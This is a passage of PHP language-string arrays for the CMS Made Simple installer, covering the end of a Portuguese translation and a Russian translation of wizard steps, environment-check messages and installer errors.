$lang['step2_info_freshen'] = 'Refrescar esta instalação envolve repor todos os ficheiros do núcleo e recriar a configuração. Ser-lhe-a pedida informação básica de configuração, contudo a base de dados não será tocada.';
$lang['step2_installdate'] = 'Data aproximada de instalação';
$lang['step2_hdr_upgradeinfo'] = 'Informação de versão';
$lang['step2_info_upgradeinfo'] = 'De seguida encontra as notas de lançamento e informações de modificações (changelog) disponíveis para cada versão. Os botões visíveis permitem consultar informações detalhadas sobre o que mudou em cada versão do CMS Made Simple. Poderão haver mais instruções ou avisos em cada versão que podem afectar o processo de actualização.';
$lang['step2_minupgradever'] = 'A versão mínima que esta aplicação consegue actualizar é: %s. Poderá ser necessário actualizar a sua aplicação para uma versão mais recente por estágios, e através de outro método, antes de terminar este processo de actualização. Por favor certifique-se de que tem uma cópia de segurança completa e verificada, antes de usar qualquer método de actualização.';
$lang['step2_nocmsms'] = 'Não foi encontrada nenhuma instalação do CMS Made Simple neste directório. Parece ser uma instalação nova';
$lang['step2_passed'] = 'Passado';
$lang['step2_pwd'] = 'O seu directório de trabalho actual';
$lang['step2_schemaver'] = 'Versão do Schema da Base de Dados';
$lang['step2_version'] = 'A versão detectada';
$lang['step3_failed'] = 'Esta aplicação executou numerosos testes ao ambiente PHP corrente, e um ou mais destes testes falharam. É necessário rectificar esses erros nesta configuração antes de continuar. Uma vez rectificados os erros, clique \'Tentar de Novo\' abaixo.';
$lang['step3_passed'] = 'Esta aplicação executou numerosos testes ao ambiente PHP corrente, e todos passaram com sucesso. São boas notícias. Não sendo testes conclusivos, não deverá ter nenhuma dificuldade a usar a instalação do núcleo do CMSMS.';
$lang['step9_removethis'] = '<strong>Aviso</strong> Por motivos de segurança é extremamente importante a remoção do assistente de instalação de qualquer sitio acessível publicamente no site assim que tenha verificado que a operação tenha tido sucesso.';
$lang['symbol'] = 'Símbolo';
$lang['social_message'] = 'Foi instalado o CMS Made Simple com sucesso!';
$lang['test_failed'] = 'Um teste requerido falhou';
$lang['test_passed'] = 'Um teste passou (testes bem sucedidos só são visíveis no modo avançado)';
$lang['test_warning'] = 'Uma configuração está acima do valor mínimo requerido, mas abaixo do valor recomendado, ou... Um recurso, que pode ser requerido para uma funcionalidade opcional, não está disponível';
$lang['th_status'] = 'Estado';
$lang['th_testname'] = 'Teste';
$lang['th_value'] = 'Valor';
$lang['title_error'] = 'Houston, temos um problema!';
$lang['title_step2'] = 'Passo 2 - Detectar software existente';
$lang['title_step3'] = 'Passo 3 - Testes';
$lang['title_step4'] = 'Passo 4 - Informações Básicas de Configuração';
$lang['title_step5'] = 'Passo 5 - Informações de Conta de Administração';
$lang['title_step6'] = 'Passo 6 - Configurações do Site';
$lang['title_step7'] = 'Passo 7 - Instalar Ficheiros da Aplicação';
$lang['title_step8'] = 'Passo 8 - Procedimentos da Base de Dados';
$lang['title_step9'] = 'Passo 9 - Finalização';
$lang['title_welcome'] = 'Bem-vindo';
$lang['title_forum'] = 'Fórum de Apoio';
$lang['title_docs'] = 'Documentação Oficial';
$lang['title_api_docs'] = 'Documentação Oficial do API';
$lang['to'] = 'ao';
$lang['title_share'] = 'Partilhe a sua experiência com os seus amigos.';
$lang['tmpfile'] = 'Verificação de mpfile() funcional';
$lang['upgrade'] = 'Actualizar';
$lang['upgrade_deleteoldevents'] = 'A apagar eventos antigos';
$lang['upgrading_schema'] = 'A actualizar schema de base de dados';
$lang['upload_max_filesize'] = 'Verificação do tamanho máximo de upload de ficheiros';
$lang['username'] = 'Nome de Utilizador';
$lang['warn_disable_functions'] = 'Nota: uma ou mais funções PHP estão activas. Estas podem ter um impacto negativo na sua instalação do CMSMS, particularmente com módulos desenvolvidos por terceiros. Por favor vigie o ficheiro de registo de erros (error log). As funções que estão desabilitadas são: %s';
$lang['warn_max_execution_time'] = 'Apesar do tempo máximo de execução de %s exceda o valor mínimo necessário de %s, recomenda-se que aumente este valor para %s ou superior';
$lang['warn_memory_limit'] = 'O limite de memória encontrado é de %s, sendo assim acima do mínimo de %s. Recomenda-se no entanto um valor de %s';
$lang['warn_open_basedir'] = 'A directiva open_basedir está habilitada na sua configuração de PHP. Apesar de poder continuar a instalação, o CMSMS não dá suporte a utilizadores com relação a instalações em ambientes com restrições de open_basedir.';
$lang['warn_post_max_size'] = 'Apesar do tamanho máximo de post de %s exceda o valor mínimo necessário de %s, recomenda-se que aumente este valor para %s ou superior, e que este seja superior ao valor de upload_max_filesize';
$lang['warn_tests'] = 'Nota: o sucesso na passagem de todos estes testes deverá assegurar que o CMSMS funcione adequadamente na maioria dos sites. No entanto, à medida que o site cresça, e mais funcionalidades sejam adicionadas, estes valores mínimos podem-se revelar insuficientes. Adicionalmente, módulos desenvolvidos por terceiros podem requerer recursos adicionais ou com valores acima dos encontrados para funcionar adequadamente';
$lang['warn_upload_max_filesize'] = 'Embora a configuração PHP de %s de upload_max_filesize seja suficiente, recomendamos incrementar este valor para pelo menos %s';
$lang['welcome_message'] = 'Bem-vindo! Este é o Mecanismo de Instalação Automática do CMS Made Simple. Este permitir-lhe-á, de forma rápida e fácil, confirmar se o seu servidor web é compatível com o CMSMS, e instalar ou actualizar o CMS Made Simple para a versão mais recente. Temos a certeza de que o irá apreciar.';
$lang['wizard_step1'] = 'Bem-vindo';
$lang['wizard_step2'] = 'Detectar Software';
$lang['wizard_step3'] = 'Testes de Compatibilidade';
$lang['wizard_step4'] = 'Dados de Configuração';
$lang['wizard_step5'] = 'Dados de Conta Admin';
$lang['wizard_step6'] = 'Configurações do Site';
$lang['wizard_step7'] = 'Ficheiros';
$lang['wizard_step8'] = 'Configuração de Base de Dados';
$lang['wizard_step9'] = 'Finalizar';
$lang['xml_functions'] = 'A verificar a funcionalidade XML';
$lang['yes'] = 'Sim';
?><?php
$lang['action_freshen'] = 'Обновление / Восстановление  CMSMS %s установки';
$lang['action_install'] = 'Создание нового веб-сайта на CMS Made Simple %s';
$lang['action_upgrade'] = 'Обновить CMS Made Simple до версии %s';
$lang['advanced_mode'] = 'Включить расширенный режим';
$lang['apptitle'] = 'Помощник по установке и обновлению';
$lang['assets_dir_exists'] = 'Каталог ресурсов существует';
$lang['available_languages'] = 'Доступные языки';
$lang['build_date'] = 'Дата выпуска';
$lang['changelog_uc'] = 'История изменений';
$lang['cleaning_files'] = 'Очистка файлов, которые больше не применимы к выпуску';
$lang['config_writable'] = 'Проверить доступность записи для config.php';
$lang['confirm_freshen'] = 'Вы уверены, что хотите обновить (восстановить) существующую установку CMSMS? Используйте с особой осторожностью!';
$lang['confirm_upgrade'] = 'Вы действительно хотите начать процесс обновления';
$lang['curl_extension'] = 'Проверка расширения Curl';
$lang['create_assets_structure'] = 'Создание места для файловых ресурсов';
$lang['database_support'] = 'Проверка совместимых драйверов баз данных';
$lang['desc_wizard_step1'] = 'Запустите процесс установки или обновления.';
$lang['desc_wizard_step2'] = 'Анализ каталога назначения для поиска существующего программного обеспечения';
$lang['desc_wizard_step3'] = 'Убедитесь, что все в порядке, чтобы установить ядро CMSMS';
$lang['desc_wizard_step4'] = 'Для новых установок и обновления выполните ввод базовой информации о конфигурации';
$lang['desc_wizard_step5'] = 'Для новых установок введите данные учетной записи администратора';
$lang['desc_wizard_step6'] = 'Для новых установок введите некоторые основные сведения о сайте';
$lang['desc_wizard_step7'] = 'Извлечь файлы';
$lang['desc_wizard_step8'] = 'Создайте или обновите схему базы данных, установите начальные события, разрешения, учетные записи пользователей, шаблоны, таблицы стилей и контент';
$lang['desc_wizard_step9'] = 'Установите и / или обновите модули по мере необходимости, напишите файл конфигурации и очистите.';
$lang['destination_directory'] = 'Справочник назначения';
$lang['dest_writable'] = 'Разрешение записи в каталоге назначения';
$lang['disable_functions'] = 'Проверка отключенных функций';
$lang['done'] = 'Готово';
$lang['email_accountinfo_message'] = 'Установка CMS Made Simple завершена.
Это электронное письмо содержит конфиденциальную информацию и должно храниться в безопасном месте.
Ниже приведены сведения о вашей установке.
Имя пользователя: %s
Пароль: %s
Каталог установки: %s
Корневой URL: %s';
$lang['email_accountinfo_message_exp'] = 'Установка CMS Made Simple завершена.
Это электронное письмо содержит конфиденциальную информацию и должно храниться в безопасном месте.
Ниже приведены сведения о вашей установке.
Имя пользователя: %s
Пароль: %s
Каталог установки: %s';
$lang['email_accountinfo_subject'] = 'CMS MadeSimple успешно установлена';
$lang['emailaccountinfo'] = 'Отправить данные учетной записи';
$lang['emailaddr'] = 'Адрес электронной почты';
$lang['error_adminacct_emailaddr'] = 'Указанный адрес электронной почты недействителен';
$lang['error_adminacct_emailaddrrequired'] = 'Вы выбрали для отправки информации об учетной записи, но не указали действительный адрес электронной почты';
$lang['error_adminacct_password'] = 'Указанный вами пароль недействителен (должно быть не менее шести символов)';
$lang['error_adminacct_repeatpw'] = 'Введенные вами пароли не совпадали.';
$lang['error_adminacct_username'] = 'Указанное вами имя пользователя недействительно. Пожалуйста, попробуйте еще раз';
$lang['error_admindirrenamed'] = 'Похоже, что по соображениям безопасности вы, возможно, переименовали свой каталог CMSMS Admin. Вы должны отменить <a href=&quot;https://docs.cmsmadesimple.org/general-information/securing-cmsms#renaming-admin-folder&quot; target=&quot;_blank&quot; class=&quot;external&quot;>этот процесс</a> в чтобы продолжить!<br/><br/>После того, как вы вернули имя каталога администратора в исходное местоположение, перезагрузите эту страницу..';
$lang['error_backupconfig'] = 'Мы не смогли создать резервную копию файла config.php';
$lang['error_checksum'] = 'Исправленная контрольная сумма файла не соответствует оригиналу';
$lang['error_cmstablesexist'] = 'Похоже, что в этой базе данных уже установлена CMS. Введите другую информацию о базе данных. Если вы хотите использовать другой префикс таблицы, вам может потребоваться перезапустить процесс установки и включить расширенный режим.';
$lang['error_createtable'] = 'Проблема создания таблицы базы данных ... возможно, это проблема с разрешениями';
$lang['error_dbconnect'] = 'Мы не смогли подключиться к базе данных. Повторите проверку учетных данных, которые вы предоставили';
$lang['error_dirnotvalid'] = 'Каталог %s не существует (или не записывается)';
$lang['error_droptable'] = 'Проблема с отбрасыванием таблицы базы данных ... возможно, это проблема с разрешениями';
$lang['error_filenotwritable'] = 'Файл%s не может быть перезаписан (проблема с разрешениями)';
$lang['error_internal'] = 'Извините, что-то пошло не так ... (внутренняя ошибка) (%s)';
$lang['error_invalid_directory'] = 'Похоже, что каталог, который вы выбрали для установки, является рабочим каталогом самого установщика';
$lang['error_invalidconfig'] = 'Ошибка в файле конфигурации или отсутствующий файл конфигурации';
$lang['error_invaliddbpassword'] = 'пароль базы данных содержит недопустимые символы, которые нельзя безопасно сохранить.';
$lang['error_invalidkey'] = 'Неверная переменная участника или ключ %s для класса %s';
$lang['error_invalidparam'] = 'Недопустимый параметр или значение параметра:%s';
$lang['error_invalidtimezone'] = 'Указанный часовой пояс недействителен';
$lang['error_invalidqueryvar'] = 'Введенная переменная запроса содержит недопустимые символы. Используйте только буквенно-цифровые символы и символы подчеркивания.';
$lang['error_missingconfigvar'] = 'Ключ &quot;%s&quot; либо отсутствует, либо недействителен в файле config.ini';
$lang['error_noarchive'] = 'Поиск файла архива ... перезагрузите';
$lang['error_nlsnotfound'] = 'Поиск файлов NLS в архиве';
$lang['error_nodatabases'] = 'Не удалось найти совместимые расширения базы данных';
$lang['error_nodbhost'] = 'Введите правильное имя хоста (или IP-адрес) для подключения к базе данных';
$lang['error_nodbname'] = 'Введите имя допустимой базы данных на указанном выше узле';
$lang['error_nodbpass'] = 'Введите действительный пароль для аутентификации в базу данных';
$lang['error_nodbprefix'] = 'Введите действительный префикс для таблиц базы данных';
$lang['error_nodbtype'] = 'Выберите тип базы данных';
$lang['error_nodbuser'] = 'Введите действительное имя пользователя для аутентификации в базу данных';
$lang['error_nodestdir'] = 'Целевой каталог не установлен';
$lang['error_nositename'] = 'Имя сайта является обязательным параметром. Введите подходящее имя для своего сайта.';
$lang['error_notimezone'] = 'Ведите действительный часовой пояс для этого сервера';
$lang['error_overwrite'] = 'Проблема с разрешениями: невозможно перезаписать %s';
$lang['error_sendingmail'] = 'Ошибка отправки почты';
$lang['error_tzlist'] = 'Возникла проблема с получением списка идентификаторов часовых поясов';
$lang['errorlevel_estrict'] = 'Проверка на E_STRICT';
$lang['errorlevel_edeprecated'] = 'Проверка на E_DEPRECATED';
$lang['edeprecated_enabled'] = 'E_DEPRECATED включен в PHP error_reporting. Хотя это не будет препятствовать работе CMSMS, это может привести к появлению предупреждений на экране вывода, в частности, из более старых, сторонних модулей';
$lang['estrict_enabled'] = 'E_STRICT включен в PHP error_reporting. Хотя это не будет препятствовать работе CMSMS, это может привести к отображению предупреждений на выходе HTML, особенно из более старых, сторонних модулей';
$lang['fail_assets_dir'] = 'Каталог ресурсов уже существует. Это приложение может писать в этот каталог, чтобы рационализировать расположение файлов. Убедитесь, что у вас есть резервная копия';
$lang['fail_assets_msg'] = 'Каталог ресурсов уже существует. Это приложение может писать в этот каталог, чтобы рационализировать расположение файлов. Убедитесь, что у вас есть резервная копия';
$lang['fail_config_writable'] = 'HTTP-процесс не может записываться в файл config.php. Попробуйте изменить разрешения для этого файла на 777, пока процесс обновления не будет завершен';
$lang['fail_curl_extension'] = 'Расширение Curl не найдено. Хотя это не критическая проблема, это может вызвать проблемы с некоторыми сторонними модулями';
$lang['fail_database_support'] = 'Не найдено драйверов совместимых баз данных';
$lang['fail_file_get_contents'] = 'Функция file_get_contents не существует или отключена. CMSMS Не удается продолжить (даже установщик, вероятно, не сработает)';
$lang['fail_file_uploads'] = 'Возможности загрузки файлов в этой среде отключены. Некоторые функции CMSMS не будут работать в этой среде';
$lang['fail_func_json'] = 'Функция json не найдена';
$lang['fail_func_gzopen'] = 'Функция gzopen не найдена';
$lang['fail_func_md5'] = 'Функциональность md5 не найдена';
$lang['fail_func_tempnam'] = 'Функция tempnam не существует. Это обязательная функция для функциональности CMSMS';
$lang['fail_func_ziparchive'] = 'Функция ZipArchive не найдена. Это может ограничить функциональность';
$lang['fail_ini_set'] = 'Похоже, мы не можем изменить настройки ini. Это может вызвать проблемы в сторонних модулях (или при включении режима отладки)';
$lang['fail_intl_support'] = 'Расширение интернационализации PHP недоступно';
$lang['fail_magic_quotes_runtime'] = 'Похоже, что в вашей конфигурации включены магические кавычки. Отключите их и повторите попытку.';
$lang['fail_max_execution_time'] = 'Максимальное время выполнения %s не соответствует минимальному значению %s. Рекомендуем увеличить его до %s или выше.';
$lang['fail_memory_limit'] = 'Предельное значение вашей памяти слишком низкое. У вас есть %s, однако требуется минимум %s, и рекомендуется %s';
$lang['fail_multibyte_support'] = 'Поддержка Multibyte не включена в вашей конфигурации';
$lang['fail_output_buffering'] = 'Буферизация вывода не включена.';
$lang['fail_open_basedir'] = 'Действуют ограничения Open_basedir. CMSMS требует, чтобы это было отключено';
$lang['fail_php_version'] = 'Версия PHP, доступная для CMSMS, имеет решающее значение. Минимальная принятая версия - %s, хотя мы рекомендуем %s или больше. У вас %s';
$lang['fail_post_max_size'] = 'Максимальный размер  %s не соответствует минимальному значению %s. Рекомендуется использовать значение %s или более, и убедитесь, что оно больше, чем upload_max_filesize';
$lang['fail_pwd_writable2'] = 'HTTP-процесс должен иметь возможность записывать в целевой каталог (и ко всем файлам и каталогам под ним) для установки файлов. У нас нет разрешения на запись (по крайней мере) %s';
$lang['fail_register_globals'] = 'Пожалуйста, отключите register_globals в вашей конфигурации PHP';
$lang['fail_remote_url'] = 'Мы столкнулись с проблемами, связанными с удаленным URL. Это ограничит некоторые функции CMS Made Simple';
$lang['fail_safe_mode'] = 'CMSMS не будет работать должным образом в среде, где включен безопасный режим. Безопасный режим устарел как неудачный механизм и будет удален в будущих версиях PHP';
$lang['fail_session_save_path_exists'] = 'Значение переменной save_path недействительно или каталог не существует';
$lang['fail_session_save_path_writable'] = 'Каталог save_path сеанса недоступен для записи';
$lang['fail_session_use_cookies'] = 'CMSMS требует, чтобы PHP был настроен на сохранение ключа сессии в файле cookie';
$lang['fail_tmpfile'] = 'Функция tmpfile () системы не работает. Это необходимо для того, чтобы мы могли извлекать архивы. Необязательный аргумент url TMPDIR может быть предоставлен установщику для указания каталога для записи. См. Файл README, который должен быть включен в этот каталог.';
$lang['fail_tmp_dirs_empty'] = 'Временные каталоги CMSMS <em>(tmp/cache и tmp/templates_c) существуют и не являются пустыми. Удалите или опустите их.';
$lang['fail_xml_functions'] = 'Расширение XML не найдено. Включите это в PHP';
$lang['failed'] = 'неудачно';
$lang['file_get_contents'] = 'Проверка функции file_get_contents';
$lang['file_installed'] = 'Установлено %s';
$lang['file_uploads'] = 'Проверка поддержки загрузки файлов';
$lang['finished_custom_freshen_msg'] = 'Ваша версия была обновлена! Обновлены основные файлы и создан новый файл конфигурации. Посетите веб-сайт, чтобы убедиться, что все работает правильно.';
$lang['finished_custom_install_msg'] = 'Готово! Посетите веб-сайт и войдите в панель администратора.';
$lang['finished_custom_upgrade_msg'] = 'Готово! Посетите панель администратора CMSMS и интерфейс, чтобы убедиться, что все работает правильно. <br/> <strong> Подсказка: </strong>Теперь самое подходящее время для создания резервной копии.';
$lang['finished_freshen_msg'] = 'Ваша версия была обновлена! Обновлены основные файлы и создан новый файл конфигурации. Теперь вы можете <a href=&quot;%s&quot;> посетить свой сайт </a> или войти в <a href=&quot;%s&quot;> панель администратора CMSMS </a>.';
$lang['finished_install_msg'] = 'Мы это сделали! Теперь вы можете <a href=&quot;%s&quot;> посетить свой сайт </a> или войти в <a href=&quot;%s&quot;> панель администрирования CMSMS </a>.';
$lang['finished_upgrade_msg'] = 'Все готово! Пожалуйста, посетите <a href=&quot;%s&quot;> веб-сайт </a> и <a href=&quot;%s&quot;> панель администратора </a>, чтобы проверить правильность работы. Вам также может потребоваться обновить некоторые сторонние модули. <br/> <strong> Совет: </strong> Не забудьте создать резервную копию после проверки правильного работы сайта.';
$lang['freshen'] = 'Обновление (восстановление)';
$lang['func_json'] = 'Проверка функции json для кодирования и декодирования';
$lang['func_md5'] = 'Проверка функциональности md5';
$lang['func_tempnam'] = 'Проверить функцию tempnam';
$lang['func_gzopen'] = 'Проверить функцию gzopen';
$lang['func_ziparchive'] = 'Проверка функции ziparchive';
$lang['gd_version'] = 'Версия GD';
$lang['goback'] = 'Назад';
$lang['info_addlanguages'] = 'Выберите язык (в дополнение к английскому) для установки. <strong> Примечание: </strong> не все переводы завершены.';
$lang['info_adminaccount'] = 'Укажите учетные данные для начальной учетной записи администратора. Эта учетная запись будет иметь доступ ко всем функциям консоли администратора CMSMS.';
$lang['info_advanced'] = 'Расширенный режим позволяет использовать дополнительные параметры в процедуре установки.';
$lang['info_dbinfo'] = 'CMS Made Simple хранит большое количество данных в базе данных. Соединение с базой данных является обязательным. Кроме того, учетные данные пользователя, которые вы предоставляете, должны иметь ВСЕ ПРИВИЛЕГИИ в указанной базе данных, чтобы разрешить создание, удаление и изменение таблиц, индексов и представлений.';
$lang['info_errorlevel_edeprecated'] = 'E_DEPRECATED - это флаг для отчета об ошибках PHP, который указывает, что должны отображаться предупреждения о коде, использующем устаревшие методы. Хотя ядро CMSMS пытается гарантировать, что мы больше не используем устаревшие методы, некоторые модули могут не работать. Мы рекомендуем отключить этот параметр в настройках PHP';
$lang['info_errorlevel_estrict'] = 'E_STRICT - это флаг для отчетов об ошибках PHP&#39; который указывает, что должны соблюдаться строгие стандарты кодирования. Хотя ядро CMSMS пытается соответствовать стандартам E_STRICT, некоторые модули могут не работать. Мы рекомендуем отключить этот параметр в настройках PHP';
$lang['info_installcontent'] = 'По умолчанию этот установщик создаст примеры страниц, таблиц стилей и шаблонов в CMSMS. Образец контента содержит обширную информацию и советы по созданию сайтов с CMSMS и полезен для чтения. Однако, если вы уже знакомы с CMS Made Simple, отключение этой опции приведет к минимальному набору шаблонов, таблиц стилей и страниц контента.';
$lang['info_open_basedir_session_save_path'] = 'open_basedir включен в вашей конфигурации PHP. Мы не смогли правильно проверить возможности сеанса. Однако переход к этому моменту в процессе установки, вероятно, указывает на то, что сеансы работают нормально.';
$lang['info_pwd_writable'] = 'Это приложение нуждается в разрешении на запись в текущий рабочий каталог';
$lang['info_queryvar'] = 'Переменная запроса используется внутри CMSMS для идентификации запрошенной страницы. В большинстве случаев вам не нужно настраивать это.';
$lang['info_sitename'] = 'Имя веб-сайта используется в шаблонах по умолчанию в качестве части названия. Введите имя пользователя для веб-сайта';
$lang['info_timezone'] = 'Информация о часовом поясе необходима для расчета времени и отображения времени/даты. Выберите часовой пояс сервера';
$lang['ini_set'] = 'Тестирование, если мы сможем изменить настройки INI';
$lang['install'] = 'Установка';
$lang['install_attachstylesheets'] = 'Прикреплять таблицы стилей к темам';
$lang['install_backupconfig'] = 'Резервное копирование файла конфигурации';
$lang['install_createassets'] = 'Создание структуры активов';
$lang['install_created_index'] = 'Созданный индекс  %s ...%s';
$lang['install_create_tables'] = 'Создание таблиц базы данных';
$lang['install_createconfig'] = 'Создать новый файл конфигурации';
$lang['install_createcontentpages'] = 'Создание страниц контента по умолчанию';
$lang['install_created_table'] = 'Созданная таблица %s: ....%s';
$lang['install_createtablesindexes'] = 'Создание таблиц и индексов';
$lang['install_createtmpdirs'] = 'Создание временных каталогов';
$lang['install_creating_index'] = 'Созданный индекс %s';
$lang['install_default_collections'] = 'Установить коллекции по умолчанию';
$lang['install_defaultcontent'] = 'Установка контента по умолчанию';
$lang['install_detectlanguages'] = 'Обнаружение установленных языков';
$lang['install_dropping_tables'] = 'Очистить таблицы';
$lang['install_dummyindexhtml'] = 'Создание файлов index.html';
$lang['install_extractfiles'] = 'Извлечение файлов из архива';
$lang['install_initevents'] = 'Создание событий';
$lang['install_initsitegroups'] = 'Создание начальных групп';
$lang['install_initsiteperms'] = 'Установить начальные разрешения';
$lang['install_initsiteprefs'] = 'Настройка начальных настроек сайта';
$lang['install_initsiteusers'] = 'Создать начальную учетную запись пользователя';
$lang['install_initsiteusertags'] = 'Начальные пользовательские теги';
$lang['install_module'] = 'Установить модуль%s';
$lang['install_modules'] = 'Установка доступных модулей';
$lang['install_passwordsalt'] = 'Установить соль паролей';
$lang['install_requireddata'] = 'Задайте начальные требуемые данные';
$lang['install_schema'] = 'Создание схемы базы данных';
$lang['install_setschemaver'] = 'Установить версию схемы';
$lang['install_setsequence'] = 'Сбросить таблицы последовательности';
$lang['install_setsitename'] = 'Укажите имя сайта';
$lang['install_stylesheets'] = 'Создание таблиц стилей по умолчанию';
$lang['install_templates'] = 'Создание шаблонов по умолчанию';
$lang['install_templatetypes'] = 'Создание стандартных типов шаблонов';
$lang['install_update_sequences'] = 'Обновить таблицы последовательности';
$lang['install_updatehierarchy'] = 'Обновление позиций иерархии контента';
$lang['install_updateseq'] = 'Обновить последовательность для %s';
$lang['installer_ver'] = 'Версия установщика';
$lang['intl_support'] = 'Проверьте возможности интернационализации';
$lang['legend'] = 'Легенда';
$lang['magic_quotes_runtime'] = 'Убедитесь, что магические кавычки отключены';
$lang['max_execution_time'] = 'Проверка максимального времени выполнения PHP-скрипта';
$lang['meaning'] = 'Имея в виду';
$lang['memory_limit'] = 'Проверка достаточного предела памяти PHP';
$lang['msg_clearedcache'] = 'Очищенный кеш сервера';
$lang['msg_configsaved'] = 'Существующий файл конфигурации, сохранен в %s';
$lang['msg_upgrade_module'] = 'Обновленный модуль%s';
$lang['msg_upgrademodules'] = 'Обновление модулей';
$lang['msg_yourvalue'] = 'У вас есть: %s';
$lang['multibyte_support'] = 'Проверить поддержку мультибайта';
$lang['next'] = 'Следующий';
$lang['no'] = 'Нет';
$lang['none'] = 'Никто';
$lang['open_basedir'] = 'Ограничения open_basedir';
$lang['open_basedir_session_save_path'] = 'open_basedir включен. Не удается проверить путь сохранения сеанса.';
$lang['output_buffering'] = 'Обеспечение включения буферизации вывода';
$lang['pass_config_writable'] = 'Процесс HTTP имеет разрешение на запись в файл config.php';
$lang['pass_database_support'] = 'Найден хотя бы один совместимый драйвер базы данных';
$lang['pass_func_json'] = 'обнаружена функция json';
$lang['pass_func_md5'] = 'Функция md5 была обнаружена';
$lang['pass_func_tempnam'] = 'Функция tempnam существует';
$lang['pass_intl_support'] = 'Возможности интернационализации включены';
$lang['pass_memory_limit_nolimit'] = 'Нет предустановленного ограничения памяти PHP';
$lang['pass_multibyte_support'] = 'Поддержка Multibyte включена';
$lang['pass_php_version'] = 'В настоящее время настроенная PHP-версия не отвечает минимальным требованиям. Как минимум, требуется PHP %s, хотя мы рекомендуем %s или выше';
$lang['pass_pwd_writable'] = 'HTTP-процесс может записываться в целевой каталог. Это необходимо для извлечения файлов';
$lang['password'] = 'Пароль';
$lang['ph_sitename'] = 'Введите имя сайта';
$lang['php_version'] = 'Версия PHP';
$lang['post_max_size'] = 'Проверка максимального объема данных, которые могут быть отправлены по одному запросу';
$lang['prompt_addlanguages'] = 'Дополнительные языки';
$lang['prompt_createtables'] = 'Создание таблиц базы данных';
$lang['prompt_dbhost'] = 'Имя хоста базы данных';
$lang['prompt_dbinfo'] = 'Информация о базе данных';
$lang['prompt_dbname'] = 'Имя базы данных';
$lang['prompt_dbpass'] = 'Пароль';
$lang['prompt_dbport'] = 'Порт базы данных';
$lang['prompt_dbprefix'] = 'Префикс имени таблицы базы данных';
$lang['prompt_dbtype'] = 'Тип базы данных';
$lang['prompt_dbuser'] = 'Имя пользователя';
$lang['prompt_dir'] = 'Каталог установки';
$lang['prompt_installcontent'] = 'Установить примеры контента';
$lang['prompt_queryvar'] = 'Переменная запроса';
$lang['prompt_sitename'] = 'Название веб-сайта';
$lang['prompt_timezone'] = 'Часовой пояс';
$lang['pwd_writable'] = 'Переписываемый каталог';
$lang['queue_for_upgrade'] = 'Очередному не ядерному модулю %s для обновления на следующем шаге.';
$lang['readme_uc'] = 'Справка';
$lang['register_globals'] = 'Обеспечение  &quot;регистров глобальных переменных &quot; выключен';
$lang['remote_url'] = 'Проверьте, можем ли мы делать исходящие HTTP-соединения';
$lang['repeatpw'] = 'Повторите пароль';
$lang['reset_site_preferences'] = 'Сбросить настройки сайта';
$lang['reset_user_settings'] = 'Сбросить настройки пользователя';
$lang['retry'] = 'Повторить';
$lang['safe_mode'] = 'Тест для обеспечения &quot;безопасного режима&quot; выключен';
$lang['saltpasswords'] = 'Солевые пароли';
$lang['select_language'] = 'Первое, что мы попросим вас сделать, это выбрать нужный язык из списка ниже. Это сделано для вашего удобства во время шагов по установки системы, но не повлияет на выбор языка установленной CMSMS.';
$lang['send_admin_email'] = 'Отправить учетные данные для входа администратора';
$lang['session_capabilities'] = 'Тестирование правильных возможностей сеанса (сеансы используют файлы cookie и путь сохранения сеанса доступен для записи и т.д.)';
$lang['session_save_path_exists'] = 'Session Save_path существует';
$lang['session_save_path_writable'] = 'Session Save_path доступен для записи';
$lang['session_use_cookies'] = 'Обеспечение того, чтобы сеансы PHP использовали файлы cookie';
$lang['sometests_failed'] = 'Мы провели многочисленные тесты вашей текущей веб-среды. Несмотря на то, что не было обнаружено критических проблем, мы рекомендуем, чтобы следующие пункты были исправлены до продолжения.';
$lang['step1_advanced'] = 'Расширенный режим';
$lang['step1_destdir'] = 'Выбрать каталог';
$lang['step1_info_destdir'] = '<strong> Предупреждение: </strong>. Эта программа может установить или обновить несколько установок CMS Made Simple. Важно, чтобы вы выбрали правильный каталог для установки или обновления.';
$lang['step1_language'] = 'Выберите язык';
$lang['step1_title'] = 'Выберите язык';
$lang['step2_cmsmsfound'] = 'Была обнаружена установленная CMS Made Simple. Можно обновить эту версию. Однако перед продолжением убедитесь, что у вас есть текущая резервная копия всех файлов и базы данных';
$lang['step2_cmsmsfoundnoupgrade'] = 'Невозможно обновить эту версию с помощью этого приложения. Версия может быть слишком старой.';
$lang['step2_confirminstall'] = 'Вы уверены, что хотите установить CMS Made Simple';
$lang['step2_confirmupgrade'] = 'Вы уверены, что хотите обновить CMS Made Simple';
$lang['step2_errorsamever'] = 'Выбранный каталог содержит установленную CMSMS с той же версией, которая включена в этот скрипт. Продолжение будет обновлять установку.';
$lang['step2_errortoonew'] = 'Выбранный каталог содержит установленную CMSMS с более новой версией, включенной в этот скрипт. Не удалось продолжить';
$lang['step2_info_freshen'] = 'Обвновление включает в себя замену всех основных файлов и воссоздание конфигурации. Вам будет предложена основная информация о конфигурации, однако база данных не будет затронута.';
$lang['step2_installdate'] = 'Ориентировочная дата установки';
$lang['step2_install_dirnotempty2'] = 'Эта папка уже содержит некоторые файлы и /или подпапки. Хотя здесь можно установить CMSMS, это может привести к портированию существующего приложения. Проверьте содержимое этой папки. Для справки некоторые из файлов перечислены ниже. Убедитесь, что это правильно.';
$lang['step2_hdr_upgradeinfo'] = 'Информация о версии';
$lang['step2_info_upgradeinfo'] = 'Ниже приведены доступные примечания к выпуску и сведения о изменениях для каждой версии. На приведенных ниже кнопках будет отображаться подробная информация о том, что изменилось в каждой версии CMS Made Simple. В каждой версии могут быть дополнительные инструкции или предупреждения, которые могут повлиять на процесс обновления.';
$lang['step2_minupgradever'] = 'Минимальная версия, которую может обновить это приложение: %s. Возможно, вам потребуется обновить приложение до более новой версии поэтапно, используя другой метод перед завершением процесса обновления. Перед использованием любого метода обновления убедитесь, что у вас есть полная проверенная резервная копия.';
$lang['step2_nocmsms'] = 'Мы не нашли установленную CMS Made Simple в этом каталоге. Похоже, это новая установка';
$lang['step2_nofiles'] = 'В соответствии с запросом, файлы CMSMS Core не будут обрабатываться во время этого процесса';
$lang['step2_passed'] = 'Прошло';
$lang['step2_pwd'] = 'Ваш текущий каталог';
$lang['step2_schemaver'] = 'Версия схемы базы данных';
$lang['step2_version'] = 'Ваша версия';
$lang['step3_failed'] = 'Этот пакет выполнил многочисленные тесты вашей среды PHP, и один или несколько из этих тестов потерпели неудачу. Прежде чем продолжить, вам нужно будет исправить эти ошибки в своей конфигурации. После исправления ошибок нажмите &quot; Повторить &quot; ниже.';
